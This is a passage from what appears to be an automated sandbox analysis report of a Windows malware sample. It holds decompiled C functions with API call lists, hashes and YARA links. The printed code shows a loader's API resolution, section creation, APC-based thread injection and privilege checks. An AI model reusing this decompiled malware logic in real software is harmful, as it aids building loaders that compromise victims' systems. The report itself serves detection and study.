					_t78 = (( *(_t89 + 0x42) & 0x0000ffff) << 8) + ( *(_t89 + 0x40) & 0x0000ffff);
					if(_t78 != 0) {
						_t90 =  *0x4f6d214; // 0x2000000a
						_t84 = (_t90 & 0xf0000000) + _t78;
						 *0x4f6d214 = (_t90 & 0xf0000000) + _t78;
					}
				}
				_t34 =  *0x4f6d134(0, 2); // executed
				_v36 = _t34;
				if(_t34 == 0 || _t34 == 1 || _t34 == 0x80010106) {
					_t37 = E04F68D65( &_v48,  &_v40); // executed
					_push(0);
					_t100 = _t37;
					_t38 =  *0x4f6d230; // 0xf0a5a8
					_push(0x4f6d238);
					_push(1);
					_t11 = _t38 + 0x4f6e5bc; // 0x4d283a53
					 *0x4f6d234 = 0xc;
					 *0x4f6d23c = 0;
					L04F61042();
					_t42 = E04F62A2B(_t92,  &_v56,  &_v68); // executed
					if(_t42 == 0) {
						CloseHandle(_v48);
					}
					if(_t100 != 5) {
						_t43 = _v56;
						__eflags = _t43;
						if(_t43 != 0) {
							E04F6660B(_t43 ^ 0xe8fa7dd7,  &_v44);
							_t104 = E04F62CDB(0x27);
							__eflags = _t104;
							if(_t104 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t70 =  *0x4f6d230; // 0xf0a5a8
								_t22 = _t70 + 0x4f6e8b7; // 0x78383025
								wsprintfA(_t104, _t22, _v44, _v40, _v36, _v32);
								_t107 = _t107 + 0x18;
							}
							 *0x4f6d284 = _t104;
						}
						_t44 = E04F61B0E();
						 *0x4f6d228 =  *0x4f6d228 ^ 0xe8fa7dd7;
						 *0x4f6d278 = _t44;
						_t45 = E04F62CDB(0x60);
						__eflags = _t45;
						 *0x4f6d2d4 = _t45;
						if(_t45 == 0) {
							_t100 = 8;
						} else {
							memset(_t45, 0, 0x60);
							_t60 =  *0x4f6d2d4; // 0x5e79630
							_t107 = _t107 + 0xc;
							__imp__(_t60 + 0x40);
							_t62 =  *0x4f6d2d4; // 0x5e79630
							 *_t62 = 0x4f6e85f;
							_t100 = 0;
						}
						__eflags = _t100;
						if(_t100 == 0) {
							_t48 = RtlAllocateHeap( *0x4f6d1f0, _t100, 0x52);
							__eflags = _t48;
							 *0x4f6d270 = _t48;
							if(_t48 == 0) {
								_t100 = 8;
							} else {
								_t85 =  *0x4f6d214; // 0x2000000a
								_t92 = _t85 & 0x000000ff;
								_t87 =  *0x4f6d230; // 0xf0a5a8
								_t23 = _t87 + 0x4f6e212; // 0x697a6f4d
								_t84 = _t23;
								wsprintfA(_t48, _t23, _t85 & 0x000000ff, _t85 & 0x000000ff, 0x4f6c2af);
							}
							__eflags = _t100;
							if(_t100 == 0) {
								asm("sbb eax, eax");
								E04F6660B( ~_v72 &  *0x4f6d228, 0x4f6d00c); // executed
								_t100 = E04F692A2(_t84);
								__eflags = _t100;
								if(_t100 != 0) {
									goto L32;
								}
								_t54 = E04F68A42(_t84); // executed
								__eflags = _t54;
								if(_t54 != 0) {
									__eflags = _v72;
									_t97 = _v68;
									if(_v72 != 0) {
										L31:
										_t55 = E04F68701(_t92, _t97, _v72); // executed
										_t100 = _t55;
										goto L32;
									}
									__eflags = _t97;
									if(__eflags == 0) {
										goto L32;
									}
									_t100 = E04F62577(__eflags, _t97 + 4);
									__eflags = _t100;
									if(_t100 == 0) {
										goto L32;
									}
									goto L31;
								}
								_t100 = 8;
							}
						}
					} else {
						_t82 = _v60;
						if(_t82 == 0) {
							L32:
							if(_v52 == 0 || _v52 == 1) {
								 *0x4f6d130();
							}
							goto L36;
						}
						_t83 = _t82 + 4;
						do {
							_push(1);
							_push(_t83);
							_t73 = 5;
						} while (E04F61FBF(_t73, 0) == 0x4c7);
					}
					goto L32;
				} else {
					_t100 = _t34;
					L36:
					return _t100;
				}
			}

0x04f63826
0x04f6382c
0x04f6382f
0x04f63839
0x04f63840
0x04f63844
0x04f63848
0x04f6384c
0x04f63854
0x04f63859
0x04f6385f
0x04f63866
0x04f63868
0x04f6386a
0x04f63876
0x04f63878
0x04f63878
0x04f63868
0x04f63881
0x04f63889
0x04f6388d
0x04f638a9
0x04f638ae
0x04f638af
0x04f638b1
0x04f638b6
0x04f638bb
0x04f638bd
0x04f638c4
0x04f638ce
0x04f638d4
0x04f638e3
0x04f638ea
0x04f638f0
0x04f638f0
0x04f638f9
0x04f63923
0x04f63927
0x04f63934
0x04f6393c
0x04f63948
0x04f6394a
0x04f6394c
0x04f63952
0x04f63959
0x04f63960
0x04f63967
0x04f6396a
0x04f6396f
0x04f63977
0x04f63979
0x04f63979
0x04f6397c
0x04f6397c
0x04f63982
0x04f63987
0x04f6398f
0x04f63994
0x04f63999
0x04f6399b
0x04f639a0
0x04f639cf
0x04f639a2
0x04f639a7
0x04f639ac
0x04f639b1
0x04f639b8
0x04f639be
0x04f639c3
0x04f639c9
0x04f639c9
0x04f639d0
0x04f639d2
0x04f639e1
0x04f639e7
0x04f639e9
0x04f639ee
0x04f63a1a
0x04f639f0
0x04f639f0
0x04f639f6
0x04f63a03
0x04f63a09
0x04f63a09
0x04f63a11
0x04f63a13
0x04f63a1b
0x04f63a1d
0x04f63a25
0x04f63a32
0x04f63a3c
0x04f63a3e
0x04f63a40
0x00000000
0x00000000
0x04f63a42
0x04f63a47
0x04f63a49
0x04f63a50
0x04f63a55
0x04f63a59
0x04f63a6e
0x04f63a73
0x04f63a78
0x00000000
0x04f63a78
0x04f63a5b
0x04f63a5d
0x00000000
0x00000000
0x04f63a68
0x04f63a6a
0x04f63a6c
0x00000000
0x00000000
0x00000000
0x04f63a6c
0x04f63a4d
0x04f63a4d
0x04f63a1d
0x04f638fb
0x04f638fb
0x04f63901
0x04f63a7a
0x04f63a7f
0x04f63a88
0x04f63a88
0x00000000
0x04f63a7f
0x04f63907
0x04f6390a
0x04f6390a
0x04f6390c
0x04f6390f
0x04f63917
0x04f6391e
0x00000000
0x04f63a90
0x04f63a90
0x04f63a92
0x04f63a9a
0x04f63a9a

APIs

GetModuleHandleA.KERNEL32(4C44544E,?,00000001,00000000), ref: 04F6384C
ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,04F6D238,00000000), ref: 04F638D4
CloseHandle.KERNEL32(?,?,?,?,?,?,00000001,00000000), ref: 04F638F0
wsprintfA.USER32 ref: 04F63977
memset.NTDLL ref: 04F639A7
RtlInitializeCriticalSection.NTDLL(05E795F0), ref: 04F639B8
RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 04F639E1
wsprintfA.USER32 ref: 04F63A11

Part of subcall function 04F62577: memset.NTDLL ref: 04F6258C
Part of subcall function 04F62577: lstrlenW.KERNEL32(00000000,00410025,?,00000000,7691C740), ref: 04F625C0
Part of subcall function 04F62577: StrCmpNIW.SHLWAPI(00000000,00000001,00000000), ref: 04F625CB

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: DescriptorHandleSecuritymemsetwsprintf$AllocateCloseConvertCriticalHeapInitializeModuleSectionStringlstrlen
String ID:
API String ID: 2074301645-0
Opcode ID: 5e714bb0b7588339a1eb430ddb440f0d989c66dc6f02f7f5592ba426491100b7
Instruction ID: 16c5601118c8c4186b0528878cfb14b86f9711809a1bf5a626895cdaae6ce713
Opcode Fuzzy Hash: 5e714bb0b7588339a1eb430ddb440f0d989c66dc6f02f7f5592ba426491100b7
Instruction Fuzzy Hash: D961E176A40205EFE720DF28EC84B2A73E9EB44714F054519F85AD7284E778FC02DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04F66716, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04F66716(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x4f6d214 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E04F62CDB(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E04F61D77(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x04f66723
0x04f6672a
0x04f66731
0x04f66745
0x04f66750
0x04f66768
0x04f66775
0x04f66778
0x04f6677d
0x04f66788
0x04f6678c
0x04f6679b
0x04f6679f
0x04f667bb
0x04f667bb
0x04f667bf
0x04f667bf
0x04f667c4
0x04f667c8
0x04f667ce
0x04f667cf
0x04f667d6
0x04f667dc

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000001,00000000), ref: 04F66748
GetTokenInformation.KERNELBASE(00000001,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 04F66768
GetTokenInformation.KERNELBASE(00000001,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 04F66778
CloseHandle.KERNEL32(00000001), ref: 04F667C8

Part of subcall function 04F62CDB: RtlAllocateHeap.NTDLL(00000000,-00000008,04F69765), ref: 04F62CE7

GetTokenInformation.KERNELBASE(00000001,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 04F6679B
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04F667A3
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04F667B3

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: fc05530052cb66a353a4ba0353f4e99ea6618d2268d40e04631171178f2a16e2
Instruction ID: 856f5b3cf641213103022370dc84d6c123a6b73eea80e5f0b10fa59434c23bcd
Opcode Fuzzy Hash: fc05530052cb66a353a4ba0353f4e99ea6618d2268d40e04631171178f2a16e2
Instruction Fuzzy Hash: 85215C7590024CFFEB009F90EC84EAEBBB9EB49304F0000A5E911E6150CB759E06EB60

Uniqueness

Uniqueness Score: -1.00%

Function 04F68B45, Relevance: 9.2, APIs: 6, Instructions: 152memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 04F68B86
IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 04F68C08
StrStrIW.SHLWAPI(00000000,006E0069), ref: 04F68C47
SysFreeString.OLEAUT32(00000000), ref: 04F68C69

Part of subcall function 04F64396: SysAllocString.OLEAUT32(04F6C2B8), ref: 04F643E6

SafeArrayDestroy.OLEAUT32(?), ref: 04F68CBD
SysFreeString.OLEAUT32(?), ref: 04F68CCB

Part of subcall function 04F6655F: Sleep.KERNELBASE(000001F4), ref: 04F665A7

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
String ID:
API String ID: 2118684380-0
Opcode ID: 36ad085d3853f9b54237d9d995fcaf11841692c3af984b2d30ee0c1047bd543e
Instruction ID: 85695e0c980bd178730877dc9ea06b76bf48937636c2d1058de1683c64cb113c
Opcode Fuzzy Hash: 36ad085d3853f9b54237d9d995fcaf11841692c3af984b2d30ee0c1047bd543e
Instruction Fuzzy Hash: A1513176901209EFDB00EFE8D88489EB7B6FF88340B15886DE556EB210D735AD4ACF50

Uniqueness

Uniqueness Score: -1.00%

Function 00401C6B, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401C6B(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t32;
				_Unknown_base(*)()* _t35;
				_Unknown_base(*)()* _t38;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00401589(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t48 = GetModuleHandleA( *0x403104 + 0x404014);
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48,  *0x403104 + 0x4040dc);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E0040159E(_t54);
					} else {
						_t32 = GetProcAddress(_t48,  *0x403104 + 0x4040ec);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t35 = GetProcAddress(_t48,  *0x403104 + 0x4040ff);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t38 = GetProcAddress(_t48,  *0x403104 + 0x404114);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t41 = GetProcAddress(_t48,  *0x403104 + 0x40412a);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00401147(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x00401c7a
0x00401c7e
0x00401d40
0x00401c84
0x00401c9c
0x00401cab
0x00401cb2
0x00401cb6
0x00401cb9
0x00401d38
0x00401d39
0x00401cbb
0x00401cc8
0x00401ccc
0x00401ccf
0x00000000
0x00401cd1
0x00401cde
0x00401ce2
0x00401ce5
0x00000000
0x00401ce7
0x00401cf4
0x00401cf8
0x00401cfb
0x00000000
0x00401cfd
0x00401d0a
0x00401d0e
0x00401d11
0x00000000
0x00401d13
0x00401d19
0x00401d1e
0x00401d25
0x00401d2c
0x00401d2f
0x00000000
0x00401d31
0x00401d34
0x00401d34
0x00401d2f
0x00401d11
0x00401cfb
0x00401ce5
0x00401ccf
0x00401cb9
0x00401d4e

APIs

Part of subcall function 00401589: HeapAlloc.KERNEL32(00000000,?,004016F4,?,00000000,-00000008,?,004018B6,?,00000000), ref: 00401595

GetModuleHandleA.KERNEL32(?,00000020,00000002,0000000A,?,?,?,?,00401E68,?,?,?,00000002,?,?,?), ref: 00401C90
GetProcAddress.KERNEL32(00000000,?), ref: 00401CB2
GetProcAddress.KERNEL32(00000000,?), ref: 00401CC8
GetProcAddress.KERNEL32(00000000,?), ref: 00401CDE
GetProcAddress.KERNEL32(00000000,?), ref: 00401CF4
GetProcAddress.KERNEL32(00000000,?), ref: 00401D0A

Part of subcall function 00401147: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000,00000002), ref: 004011A4
Part of subcall function 00401147: memset.NTDLL ref: 004011C6

Memory Dump Source

Source File: 00000000.00000002.575966027.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.575971229.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.575976089.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: 9b28f1e211a86110fafc392b64d69067544d99507d709244a92bba3e194b3e8a
Instruction ID: ec1513b623d90e14f43a4000e87fd2dec5a0d9ca8b008a486ace31ac311cfe9e
Opcode Fuzzy Hash: 9b28f1e211a86110fafc392b64d69067544d99507d709244a92bba3e194b3e8a
Instruction Fuzzy Hash: F6214DB1600206AFD710DF69CD84E6A7BECEF49744700457AF609FB261E778EA058B78

Uniqueness

Uniqueness Score: -1.00%

Function 0041A6B0, Relevance: 9.1, APIs: 6, Instructions: 73COMMON

Download Yara Rule

APIs

GetBoundsRect.GDI32(00000000,00000000,00000000), ref: 0041A6D6
GetProfileStringA.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041A710
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 0041A751
GetACP.KERNEL32 ref: 0041A778
IsValidCodePage.KERNEL32(00000000), ref: 0041A780
WaitCommEvent.KERNEL32 ref: 0041A7AB

Memory Dump Source

Source File: 00000000.00000002.575989176.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: BoundsCodeCommCompareEventExchangeInterlockedPageProfileRectStringValidWait
String ID:
API String ID: 1253697381-0
Opcode ID: e6982c027c03795311742c0ef8b1f4b36f63b33222be0eaf3e3677a55ddeca6f
Instruction ID: c0c03ef478fbef5d426ae23b641bfb205ee6181a263b7d7e9b9ef003784b2d01
Opcode Fuzzy Hash: e6982c027c03795311742c0ef8b1f4b36f63b33222be0eaf3e3677a55ddeca6f
Instruction Fuzzy Hash: E421E231645300AFE320CF50EC49F9A77E4BB84705F50492EF349951D1D7B8A588CB6B

Uniqueness

Uniqueness Score: -1.00%

Function 004015B3, Relevance: 7.5, APIs: 5, Instructions: 19
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				void* _t1;
				int _t4;
				void* _t6;
				void* _t7;
				int _t8;

				_t8 = 0;
				_t1 = HeapCreate(0, 0x400000, 0); // executed
				 *0x4030e0 = _t1;
				if(_t1 != 0) {
					 *0x4030f0 = GetModuleHandleA(0);
					GetCommandLineW(); // executed
					_t4 = E0040185E(_t6, _t7); // executed
					_t8 = _t4;
					HeapDestroy( *0x4030e0);
				}
				ExitProcess(_t8);
			}

0x004015b4
0x004015bd
0x004015c5
0x004015ca
0x004015d3
0x004015d8
0x004015de
0x004015e9
0x004015eb
0x004015eb
0x004015f2

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 004015BD
GetModuleHandleA.KERNEL32(00000000), ref: 004015CD
GetCommandLineW.KERNEL32 ref: 004015D8

Part of subcall function 0040185E: SwitchToThread.KERNEL32(?,00000000), ref: 0040187D
Part of subcall function 0040185E: Sleep.KERNELBASE(00000000,-00000008,?,00000000), ref: 0040189A
Part of subcall function 0040185E: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 004018DD
Part of subcall function 0040185E: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 004018FB
Part of subcall function 0040185E: CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?), ref: 00401925
Part of subcall function 0040185E: QueueUserAPC.KERNELBASE(0040121D,00000000,?,?,00000000), ref: 0040193C
Part of subcall function 0040185E: GetLastError.KERNEL32(?,00000000), ref: 0040194C
Part of subcall function 0040185E: TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401956
Part of subcall function 0040185E: CloseHandle.KERNEL32(00000000,?,00000000), ref: 0040195D
Part of subcall function 0040185E: SetLastError.KERNEL32(00000000,?,00000000), ref: 00401962
Part of subcall function 0040185E: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 0040196F
Part of subcall function 0040185E: GetExitCodeThread.KERNEL32(00000000,?,?,00000000), ref: 00401983
Part of subcall function 0040185E: CloseHandle.KERNEL32(00000000,?,00000000), ref: 0040198A

HeapDestroy.KERNEL32 ref: 004015EB
ExitProcess.KERNEL32 ref: 004015F2

Memory Dump Source

Source File: 00000000.00000002.575966027.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.575971229.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.575976089.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: Thread$Handle$CloseCreateErrorExitHeapLastLongNamePath$CodeCommandDestroyLineModuleObjectProcessQueueSingleSleepSwitchTerminateUserWait
String ID:
API String ID: 1414339429-0
Opcode ID: 7c1ca7e18bbf7c903257c646da062dcfea6e771fd0d1132f5989d01211d984eb
Instruction ID: 42b618b4aeb78799174bbe19273bdc70ec8de8a36c3c1cd19449bfb665c129a1
Opcode Fuzzy Hash: 7c1ca7e18bbf7c903257c646da062dcfea6e771fd0d1132f5989d01211d984eb
Instruction Fuzzy Hash: 19E0B671902B20ABC7112F71AF0CB4A3E69BB053927008536F602F21B1DBB94601CAAC

Uniqueness

Uniqueness Score: -1.00%

Function 04F683CB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04F683CB() {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t54;

				_v12 = 0;
				_t23 = E04F695BF(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x4f6d230; // 0xf0a5a8
				_t4 = _t24 + 0x4f6ed78; // 0x5e79320
				_t5 = _t24 + 0x4f6ed20; // 0x4f0053
				_t26 = E04F68696( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x4f6d230; // 0xf0a5a8
						_t11 = _t32 + 0x4f6ed6c; // 0x5e79314
						_t48 = _t11;
						_t12 = _t32 + 0x4f6ed20; // 0x4f0053
						_t54 = E04F667E6(_t11, _t12, _t11);
						_t58 = _t54;
						if(_t54 != 0) {
							_t35 =  *0x4f6d230; // 0xf0a5a8
							_t13 = _t35 + 0x4f6edb6; // 0x30314549
							if(E04F6969D(_t48, _t58, _v8, _t54, _t13, 0x14) == 0) {
								_t60 =  *0x4f6d214 - 6;
								if( *0x4f6d214 <= 6) {
									_t42 =  *0x4f6d230; // 0xf0a5a8
									_t15 = _t42 + 0x4f6ea0a; // 0x52384549
									E04F6969D(_t48, _t60, _v8, _t54, _t15, 0x13);
								}
							}
							_t38 =  *0x4f6d230; // 0xf0a5a8
							_t17 = _t38 + 0x4f6edb0; // 0x5e79358
							_t18 = _t38 + 0x4f6ed88; // 0x680043
							_t45 = E04F66261(_v8, 0x80000001, _t54, _t18, _t17);
							HeapFree( *0x4f6d1f0, 0, _t54);
						}
					}
					HeapFree( *0x4f6d1f0, 0, _v16);
				}
				_t53 = _v8;
				if(_v8 != 0) {
					E04F64648(_t53);
				}
				return _t45;
			}

0x04f683db
0x04f683de
0x04f683e5
0x04f683e7
0x04f683e7
0x04f683ea
0x04f683ef
0x04f683f6
0x04f68403
0x04f68408
0x04f6840c
0x04f6841a
0x04f68428
0x04f6842c
0x04f684bd
0x04f684bd
0x04f68432
0x04f68432
0x04f68437
0x04f68437
0x04f6843e
0x04f6844a
0x04f6844c
0x04f6844e
0x04f68450
0x04f68457
0x04f68469
0x04f6846b
0x04f68472
0x04f68474
0x04f6847b
0x04f68486
0x04f68486
0x04f68472
0x04f6848b
0x04f68490
0x04f68497
0x04f684b5
0x04f684b7
0x04f684b7
0x04f6844e
0x04f684c9
0x04f684c9
0x04f684cb
0x04f684d0
0x04f684d2
0x04f684d2
0x04f684dd

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05E79320,00000000,?,74E5F710,00000000,74E5F730), ref: 04F6841A
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05E79358,?,00000000,30314549,00000014,004F0053,05E79314), ref: 04F684B7
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04F6878F), ref: 04F684C9

Strings

Ut, xrefs: 04F68420

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID: Ut
API String ID: 3298025750-8415677
Opcode ID: e64ca226dc3353b1676222cf858232f4aa22d4f76cce15ca57a9f30fe5b93698
Instruction ID: 54c61bb8c2e5e92ea06599c5fcd6fbcb092e7b8e1aca8e694f546cd298e7802a
Opcode Fuzzy Hash: e64ca226dc3353b1676222cf858232f4aa22d4f76cce15ca57a9f30fe5b93698
Instruction Fuzzy Hash: 3D318F76A01109FFEB11EF95DD84EAA7BBCEB44344F1500A9EA12A7150E770AE05DB60

Uniqueness

Uniqueness Score: -1.00%

Function 04F64529, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E04F64529(intOrPtr* __eax, void* __ecx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t23;
				long _t30;
				intOrPtr _t34;
				intOrPtr* _t42;
				void* _t43;
				void* _t47;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t51;
				void* _t52;

				_t43 = __ecx;
				_t42 = _a16;
				_t48 = __eax;
				_t23 =  *0x4f6d230; // 0xf0a5a8
				_t2 = _t23 + 0x4f6e671; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t42);
				if( *0x4f6d204 >= 5) {
					_push( &_a16);
					_push( &_v8);
					_push( &_v48);
					_t30 = _a4;
					"QQSUVWh"();
					L5:
					_a4 = _t30;
					L6:
					if(_a4 != 0) {
						L9:
						 *0x4f6d204 =  *0x4f6d204 + 1;
						L10:
						return _a4;
					}
					_t50 = _a16;
					 *_t48 = _a16;
					_t49 = _v8;
					 *_t42 = E04F61F74(_t50, _t49);
					_t34 = E04F690E9(_t47, _t49, _t50);
					if(_t34 != 0) {
						 *_a8 = _t49;
						 *_a12 = _t34;
						if( *0x4f6d204 < 5) {
							 *0x4f6d204 =  *0x4f6d204 & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E04F6185B();
					HeapFree( *0x4f6d1f0, 0, _t49);
					goto L9;
				}
				_t51 =  *0x4f6d230; // 0xf0a5a8
				_t4 = _t51 + 0x4f6e7c4; // 0x6976612e
				_t52 = _t4;
				if(RtlAllocateHeap( *0x4f6d1f0, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t30 = E04F66B1C(_a4, _t43, _t47, _t52,  &_v48,  &_v8,  &_a16, _t37); // executed
				goto L5;
			}

0x04f64529
0x04f64530
0x04f64537
0x04f6453b
0x04f64540
0x04f6454b
0x04f6455b
0x04f645a4
0x04f645a8
0x04f645ac
0x04f645ad
0x04f645b0
0x04f645b5
0x04f645b5
0x04f645b8
0x04f645bc
0x04f645f6
0x04f645f6
0x04f645fc
0x04f64603
0x04f64603
0x04f645be
0x04f645c1
0x04f645c3
0x04f645d0
0x04f645d2
0x04f645d9
0x04f64610
0x04f64615
0x04f64617
0x04f64619
0x04f64619
0x00000000
0x04f64617
0x04f645db
0x04f645e2
0x04f645f0
0x00000000
0x04f645f0
0x04f6455d
0x04f64570
0x04f64570
0x04f6457e
0x04f64598
0x00000000
0x04f64598
0x04f64591
0x00000000

APIs

wsprintfA.USER32 ref: 04F6454B
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04F64576

Part of subcall function 04F66B1C: GetTickCount.KERNEL32 ref: 04F66B33
Part of subcall function 04F66B1C: wsprintfA.USER32 ref: 04F66B80
Part of subcall function 04F66B1C: wsprintfA.USER32 ref: 04F66B9D
Part of subcall function 04F66B1C: wsprintfA.USER32 ref: 04F66BBD
Part of subcall function 04F66B1C: wsprintfA.USER32 ref: 04F66BDB
Part of subcall function 04F66B1C: wsprintfA.USER32 ref: 04F66BFE
Part of subcall function 04F66B1C: wsprintfA.USER32 ref: 04F66C1F

HeapFree.KERNEL32(00000000,04F687D9,?,?,04F687D9,?), ref: 04F645F0

Strings

Ut, xrefs: 04F645F0

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: wsprintf$Heap$AllocateCountFreeTick
